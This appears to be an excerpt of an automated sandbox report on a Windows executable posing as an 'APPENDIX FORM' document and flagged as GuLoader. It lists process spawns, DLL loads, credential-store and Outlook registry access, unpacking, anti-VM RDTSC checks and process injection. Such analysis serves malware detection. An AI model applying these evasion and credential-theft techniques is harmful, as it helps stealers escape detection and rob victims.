            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985807652.000000000096F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile read: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_9-33208
            Source: unknownProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: pediculofrontal.lnk.0.drLNK file: ..\..\..\ProgramData\Microsoft\Windows\Templates\jeblets.Bul
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.cfgJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeUnpacked PE file: 8.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeUnpacked PE file: 9.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeUnpacked PE file: 10.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_10002D40 push eax; ret 0_2_10002D6E
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333F1219 push esp; iretd 4_2_333F121A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2806 push ecx; ret 4_2_333E2819
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044693D push ecx; ret 8_2_0044694D
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DB84
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DBAC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00451D54 push eax; ret 8_2_00451D61
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0A4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0CC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00451D34 push eax; ret 9_2_00451D41
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00444E71 push ecx; ret 9_2_00444E81
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00414060 push eax; ret 10_2_00414074
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00414060 push eax; ret 10_2_0041409C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00414039 push ecx; ret 10_2_00414049
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004164EB push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00416553 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00416555 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_004047CB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI/Special instruction interceptor: Address: 39F0312
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI/Special instruction interceptor: Address: 1EC0312
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeRDTSC instruction interceptor: First address: 39C96CC second address: 39C96CC instructions: 0x00000000 rdtsc 0x00000002 cmp bh, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FBF6C5232B8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeRDTSC instruction interceptor: First address: 1E996CC second address: 1E996CC instructions: 0x00000000 rdtsc 0x00000002 cmp bh, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FBF6C8165A8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeWindow / User API: threadDelayed 9718Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI coverage: 4.4 %
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI coverage: 9.9 %
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268Thread sleep count: 269 > 30Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268Thread sleep time: -807000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268Thread sleep count: 9718 > 30Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268Thread sleep time: -29154000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_00402647 FindFirstFileA,4_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_00405FE4 FindFirstFileA,FindClose,4_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_333E10F1
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_333E6580
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00418981 memset,GetSystemInfo,8_2_00418981
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.000000000288E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: bhv2DCB.tmp.8.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI call chain: ExitProcess graph end nodegraph_0-4249
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI call chain: ExitProcess graph end nodegraph_0-4253
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeAPI call chain: ExitProcess graph end nodegraph_9-34109
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LoadLibraryExA,GetProcAddress,FreeLibrary,0_2_00401F68
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E2639
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E4AB4 mov eax, dword ptr fs:[00000030h]4_2_333E4AB4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E724E GetProcessHeap,4_2_333E724E
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_333E2B1C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E2639
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E60E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"Jump to behavior
